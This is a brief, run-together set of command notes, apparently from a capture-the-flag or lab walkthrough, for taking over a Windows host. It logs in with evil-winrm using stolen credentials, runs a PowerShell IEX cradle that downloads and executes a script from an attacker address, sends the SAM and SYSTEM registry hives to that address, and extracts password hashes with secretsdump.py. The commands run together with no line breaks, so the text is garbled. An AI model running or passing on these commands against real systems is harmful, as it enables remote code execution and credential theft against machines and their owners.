5985
evil-winrm -i 10.10.144.13 -u Jareth -p sarahpython3 -m uploadserver 80IEX(New-Object Net.WebClient).DownloadString('http://10.23.10.19/PSUpload.ps1')Invoke-FileUpload -Uri http://10.23.10.19/upload -File sam.bak
Invoke-FileUpload -Uri http://10.23.10.19/upload -File system.baksecretsdump.py LOCAL -sam sam.bak -system system.bak
Last updated




